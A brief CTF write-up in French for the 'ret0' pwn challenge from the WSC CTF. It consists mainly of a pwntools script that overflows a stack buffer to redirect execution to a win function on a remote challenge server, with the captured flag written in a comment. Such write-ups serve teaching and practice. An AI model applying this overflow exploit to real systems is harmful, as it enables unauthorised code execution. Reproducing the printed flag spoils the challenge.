Tags: wsc pwn 

Rating:

J´ai mis la write up son mon github, il s´agit d´un simple ret2win
```
from pwn import *

context.binary='./ret0'
p = remote('107.191.51.129', 5000)

buffer = b"A"*16
RBP = b"A"*8
addr_print = p64(0x4011b3)

payload = buffer + RBP + addr_print
p.sendline(payload)
p.interactive()

#ret0 challs wsc ctf
#wsc{Th0s3_p3sky_STACKS!!!}
```

Original writeup (https://github.com/RxphGui/Write-Up/blob/main/exploit.py).